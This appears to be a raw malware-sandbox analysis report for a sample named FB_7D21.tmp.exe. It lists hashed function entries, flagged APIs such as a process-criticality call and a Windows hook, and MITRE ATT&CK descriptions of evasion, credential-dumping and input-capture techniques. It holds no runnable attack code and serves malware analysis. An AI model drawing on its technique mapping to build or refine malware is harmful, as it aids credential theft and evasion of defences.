Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d200c49a282fbc0d306eeb9bb3ab9e2a86f33d7c85ac5c1c26ec2289397a22c
Instruction ID: ddf800b98ea70175d952f4679ffe351944380ee6b2e0f59c45abef4b9f67404f
Opcode Fuzzy Hash: 0d200c49a282fbc0d306eeb9bb3ab9e2a86f33d7c85ac5c1c26ec2289397a22c
Instruction Fuzzy Hash: BD112C31B181511BCB2687389450B6B7BEADB82610F1484AEF645CF396DE21DC0287D5

Function 064F42A2 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a32e0084b117304d6b1885f728a79bc8825e2790777aa2cffb992ab8906b2a
Instruction ID: 0e382fc8eb75b1f9b4de873e9d5e5ed62f07df7e112030312b0f760a02fecfc8
Opcode Fuzzy Hash: 03a32e0084b117304d6b1885f728a79bc8825e2790777aa2cffb992ab8906b2a
Instruction Fuzzy Hash: A801F1307241141FDB66867D9850B2BBBDADBC5720F11843BF60ACB742ED26DD4283D5

Function 064F3C60 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9bbb57be5489efc3e04bb007172f5f11f057e8a54d09ce9bc784aff1daa4d8
Instruction ID: 712981172c91fc194ce84657012fe33856f2e48afe301f3fe20bcfe778318984
Opcode Fuzzy Hash: cb9bbb57be5489efc3e04bb007172f5f11f057e8a54d09ce9bc784aff1daa4d8
Instruction Fuzzy Hash: FD11A532B205294FDF55AA68D8146AF73ABABC9710F00413ADA06E7354EE75DC018BD0

Function 064FA377 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa65a7bd7a493f8dda9c18d08cf21d3ba1a4d7a624667e3984955b85f2c3c61
Instruction ID: 3c4d5283b05b8c228013abf49c02b8b1fab4c1e39d73ab5b52c5ab2bd79b7e90
Opcode Fuzzy Hash: caa65a7bd7a493f8dda9c18d08cf21d3ba1a4d7a624667e3984955b85f2c3c61
Instruction Fuzzy Hash: 5401D430B245144FC752AB38D960B1B7BDADB8A720F10846AF20ECB352DE21DDC283D1

Function 064F3C4F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8faa1130c98a5236b9738b9919bfa5f54db85a5f11795e7d69d56d658b17139e
Instruction ID: ecf70edcd54de8a5276eff099df7fab3c03c3a806b220db67f8ac744241ca2f1
Opcode Fuzzy Hash: 8faa1130c98a5236b9738b9919bfa5f54db85a5f11795e7d69d56d658b17139e
Instruction Fuzzy Hash: 79012432B200254BDF95AA789C107AF37EFEBC9600F00403ADA06D3344EEA19C0287D0

Function 064F42B0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63037219f65d44d980f82c5c5114cc47ac33dd41c094f2c397a70aa9de45b174
Instruction ID: ef734ecf039e65e7d186ec7b22dbeee488c5a1497fb9e372c2e41215d0063775
Opcode Fuzzy Hash: 63037219f65d44d980f82c5c5114cc47ac33dd41c094f2c397a70aa9de45b174
Instruction Fuzzy Hash: B701DC31B204140BDB6596AD9450B2FB2DAEBC8720F20883AE60ACB746EE26DC4243C5

Function 064FEE18 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a76bb016ae19ed5a72ac12f5046c816a93b59f20c7e616f1423b096418b1a4
Instruction ID: ee0cc8226b51bbddc9524f88663ccbb667bbc2b73674a6d2130503ec84f10440
Opcode Fuzzy Hash: 34a76bb016ae19ed5a72ac12f5046c816a93b59f20c7e616f1423b096418b1a4
Instruction Fuzzy Hash: 5001AF35B204111BCB66966CA460B2F63DBDBC9B21F10C83AF30ACB354EE21DC0247C5

Function 064FA388 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbdd000574778d7874c4037243745d4350425525455eb336d37f494a1ac39a04
Instruction ID: 8f705b3e5f423c44336f91e9c1adffb659acbe06ab9a0c9a4aebc566a78d4575
Opcode Fuzzy Hash: fbdd000574778d7874c4037243745d4350425525455eb336d37f494a1ac39a04
Instruction Fuzzy Hash: 43018130B205148BCB56EA6CD850B1F73DAEB89720F108829E60ECB344DE31ED8287C4

Function 064F64E8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2a5cc19f4bb62c74a843514748108be4e6c1e6fb4f8590c1bd084c89a92c60
Instruction ID: 340cec2c9400be07978a1a906c423a16e3b5046082c84e58030d956123f490e9
Opcode Fuzzy Hash: 2c2a5cc19f4bb62c74a843514748108be4e6c1e6fb4f8590c1bd084c89a92c60
Instruction Fuzzy Hash: 21F09270929289AFDF62CF70890575B7BBDEB42208F2149AAD544D7242E276CE018B91

Non-executed Functions

Function 064F7710 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$eq, xrefs: 064F7827
$eq, xrefs: 064F781B
$eq, xrefs: 064F7C99
$eq, xrefs: 064F7BD8
$eq, xrefs: 064F7BE4
$eq, xrefs: 064F7C83
$eq, xrefs: 064F7C8D
$eq, xrefs: 064F7858
$eq, xrefs: 064F7C77
$eq, xrefs: 064F784C

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-2049195972
Opcode ID: 3584ca956d5887b88552e46e5bfb171a02291a84e3ef847398ce14871b6e4b4a
Instruction ID: bb5e9a1d5c921a07ec7622ae62aa3bab44992ab19cf90f11e9ceb886276071a3
Opcode Fuzzy Hash: 3584ca956d5887b88552e46e5bfb171a02291a84e3ef847398ce14871b6e4b4a
Instruction Fuzzy Hash: DC124C30E10619CFDB65DF65D984AAEB7B2FF88300F6085AAD509AB355DB349D81CF80

Function 064FE418 Relevance: 4.3, Strings: 3, Instructions: 577COMMON

Download Yara Rule

Strings

DqHp, xrefs: 064FE4BC
0oHp, xrefs: 064FE4B0
PHeq, xrefs: 064FE678

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: 0oHp$DqHp$PHeq
API String ID: 0-4229592003
Opcode ID: ded5719e3b7bb0c57e7e161165302351e698f9a182a2ea64901134449c21d55b
Instruction ID: 16592b17e8eca7ed6422d2e351f5b08d8e63b7227a0a9b4377c471627574407c
Opcode Fuzzy Hash: ded5719e3b7bb0c57e7e161165302351e698f9a182a2ea64901134449c21d55b
Instruction Fuzzy Hash: 6C22B130B202049FDB55DB68D484B6EB7E2FF84311F24896AE506DB3A6DB31EC41CB91

Function 00E741C8 Relevance: 4.0, Strings: 3, Instructions: 281COMMON

Download Yara Rule

Strings

g , xrefs: 00E741E7
\V9n, xrefs: 00E7447F
g , xrefs: 00E74207

Memory Dump Source

Source File: 00000002.00000002.4524401615.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e70000_FB_7BD8.jbxd

Similarity

API ID:
String ID: \V9n$g $g
API String ID: 0-2967446072
Opcode ID: 638132f5eec6420f71852263265b5abbf977902c69c824f5e8c41da1606a7bc1
Instruction ID: d217ac3683d42cf468cab5474703e93630e48d39a7fefd61cd2ca90ab4b45fc7
Opcode Fuzzy Hash: 638132f5eec6420f71852263265b5abbf977902c69c824f5e8c41da1606a7bc1
Instruction Fuzzy Hash: 6EB14EB0E002199FDF14CFA9C8857ADBBF2BF88318F14D129E819B7294EB749845DB51

Function 064F5D5F Relevance: 2.9, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

\Ojq, xrefs: 064F5E92
XPjq, xrefs: 064F5FFE

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: XPjq$\Ojq
API String ID: 0-3813800045
Opcode ID: a5a2a3864a3242df884b652852d8bb1d40f3e2eb86e3742e1ae8dcd196d4784f
Instruction ID: e2fffa23d161e8366bd897089ad9da32fbd6a5fc03bd7c700432915b7e8e739a
Opcode Fuzzy Hash: a5a2a3864a3242df884b652852d8bb1d40f3e2eb86e3742e1ae8dcd196d4784f
Instruction Fuzzy Hash: 6DE1F331B201148FDB55DB68D484BAEBBF2FB89310F25846BE646DB352CA71DC41CB91

Function 064F0040 Relevance: 2.0, Instructions: 1983COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1696cd687622e59a75ca7b43bb1496638a8c291ad00792e2937f80fbaf8d9a50
Instruction ID: 8e9a28ced506da70aac5806c9912d816faba440d39e1eac29a76712bdd0adf66
Opcode Fuzzy Hash: 1696cd687622e59a75ca7b43bb1496638a8c291ad00792e2937f80fbaf8d9a50
Instruction Fuzzy Hash: 9523FA31D20A198EDB11EF68C89099DF7B1FF99300F15D69AE558B7221EB70AAC4CF41

Function 064FA9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$eq, xrefs: 064FAB2C
$eq, xrefs: 064FAB0D
$eq, xrefs: 064FAB62
$eq, xrefs: 064FAB6E
$eq, xrefs: 064FAB01
$eq, xrefs: 064FAAA6
$eq, xrefs: 064FAB38
$eq, xrefs: 064FAAB2

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: d80a35ee65707314551fc24874fbdbaeaa0fe2bea1ea01de7f06709fc6d46cb3
Instruction ID: 8a947f387a84c5ef4f763f45564652d3885c98d0d4a6a1593a9316a81aa1d9c7
Opcode Fuzzy Hash: d80a35ee65707314551fc24874fbdbaeaa0fe2bea1ea01de7f06709fc6d46cb3
Instruction Fuzzy Hash: 3C918F30A20209DFEBA5DF65D994B6F7BF2EF84300F10852AE60997395DB749D81CB90

Function 064F7110 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

.5}q, xrefs: 064F716B
$eq, xrefs: 064F744C
$eq, xrefs: 064F75AC
$eq, xrefs: 064F73F2
$eq, xrefs: 064F7458
$eq, xrefs: 064F7618
$eq, xrefs: 064F7624

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1622854337
Opcode ID: 993ba031d91eeee903cc64bdf2c67f832f9ece6bba7b2f7c822948eabb5854b3
Instruction ID: 50d0182ea9315bcc10450f7c4c1608b1b95711eb71c5c6fbb8336b951150670d
Opcode Fuzzy Hash: 993ba031d91eeee903cc64bdf2c67f832f9ece6bba7b2f7c822948eabb5854b3
Instruction Fuzzy Hash: 32F15130B20609CFDB55EF65D594A6EB7B2FF84300F649469E5159B3AACB34EC42CB80

Function 064F8448 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$eq, xrefs: 064F86AE
$eq, xrefs: 064F8713
$eq, xrefs: 064F8707
$eq, xrefs: 064F86A2

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: c014cd15f852eba6b9e398f4018f97d161206102ae0c5fe08b2307397a956f6a
Instruction ID: 6adf536920b1a99065c2cb362beb1d3559201a4db44c5f2acb648aa7c0d62765
Opcode Fuzzy Hash: c014cd15f852eba6b9e398f4018f97d161206102ae0c5fe08b2307397a956f6a
Instruction Fuzzy Hash: 3EB13930A20208CFDB55EB65D99479EB7F2EF84300F64C46AE506AB395DB74DD82CB80

Function 064F8860 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LReq, xrefs: 064F8953
LReq, xrefs: 064F89A2
$eq, xrefs: 064F88EB
$eq, xrefs: 064F88DF

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: LReq$LReq$$eq$$eq
API String ID: 0-731573373
Opcode ID: 14d20c9f39ac02f2b2aa12249301169ed542a9c6692c6752105883699c5daf75
Instruction ID: 50029d3a4c79e0e7b66ee0f6306578dbf5feabfdf90647d90310b8a96e4065d5
Opcode Fuzzy Hash: 14d20c9f39ac02f2b2aa12249301169ed542a9c6692c6752105883699c5daf75
Instruction Fuzzy Hash: 66518130B206059FDB55DB28D990A6A77F2FF84300F1485AAE5169F3A9DB30EC41CB91

Function 064FAD38 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$eq, xrefs: 064FAF14
$eq, xrefs: 064FAEEB
$eq, xrefs: 064FAEBC
$eq, xrefs: 064FAE69

Memory Dump Source

Source File: 00000002.00000002.4529399799.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_64f0000_FB_7BD8.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 1ffe0bfef4f9aa02687ab5a83a1e35076b9fd7bfbd4c5adc86bbdb320314eec3
Instruction ID: 7c5fabcc13c61b3995cccc317ed8547c4b49c0c39b9d455ca6e659275ef36747
Opcode Fuzzy Hash: 1ffe0bfef4f9aa02687ab5a83a1e35076b9fd7bfbd4c5adc86bbdb320314eec3
Instruction Fuzzy Hash: 6A518E30E20205CFDBA6DB64D4806AEB7B7EF85311F14856AE909EB356DB319C81CB91

Analysis Process: FB_7D21.tmp.exePID: 4444, Parent PID: 6224COMMON

Execution Graph

Execution Coverage:	19.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	42
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF848F21BFB Relevance: 2.0, APIs: 1, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42127242a99272e4651123aa21664bc407c30dd81398e352e603520d28ad3815
Instruction ID: 80696e5a0340099f10525ac86c52e19abe1a4a7e873597b55eb60b2586676d52
Opcode Fuzzy Hash: 42127242a99272e4651123aa21664bc407c30dd81398e352e603520d28ad3815
Instruction Fuzzy Hash: ACD15732D0DA998FE755FBBCA8551F97BA0FF52364F04027BC048CB093DB2964468399

Function 00007FF848F223BD Relevance: 1.8, APIs: 1, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392cc3e4ddd288233b396c5092b2eb355ce019f7afd9d296871636a5a67dfc75
Instruction ID: 52ad719c818a6f9fd4b7eda4622efeafd7307b8c800eee7f08d2a946e349dd24
Opcode Fuzzy Hash: 392cc3e4ddd288233b396c5092b2eb355ce019f7afd9d296871636a5a67dfc75
Instruction Fuzzy Hash: 6071363190CA888FD759EBA898096F9BBF0FF56310F04017ED08AC3182DF399846CB91

Function 00007FF848F2241D Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF848F225F2

Memory Dump Source

Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 6224fba3fac5cfe427266da6e8b360706324ef8463ec013cfa48a402b208afd2
Instruction ID: 5757704b46b6afe414f822ece00884422a37cbe4b624d3c6dcf33541efb60976
Opcode Fuzzy Hash: 6224fba3fac5cfe427266da6e8b360706324ef8463ec013cfa48a402b208afd2
Instruction Fuzzy Hash: A671253190CA898FD719EBA8D8496E9BBF0FF55311F04417ED08AC3182DF39A846CB81

Function 00007FF848F227B1 Relevance: 1.8, APIs: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF848F22961

Memory Dump Source

Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 40fe6a51aacfb89cfd8f0ebf5cbd09bb1987faf1daee964f8e7576aded1892e5
Instruction ID: ee603891463837ac407d4990bc4d2923ee67bd8efdc5caf3fdb35fd4107b4e0f
Opcode Fuzzy Hash: 40fe6a51aacfb89cfd8f0ebf5cbd09bb1987faf1daee964f8e7576aded1892e5
Instruction Fuzzy Hash: 1561D43190CA5C9FDB58EB68D8496F9BBE1FF55321F00422FD049C3292CB75A846CB81

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
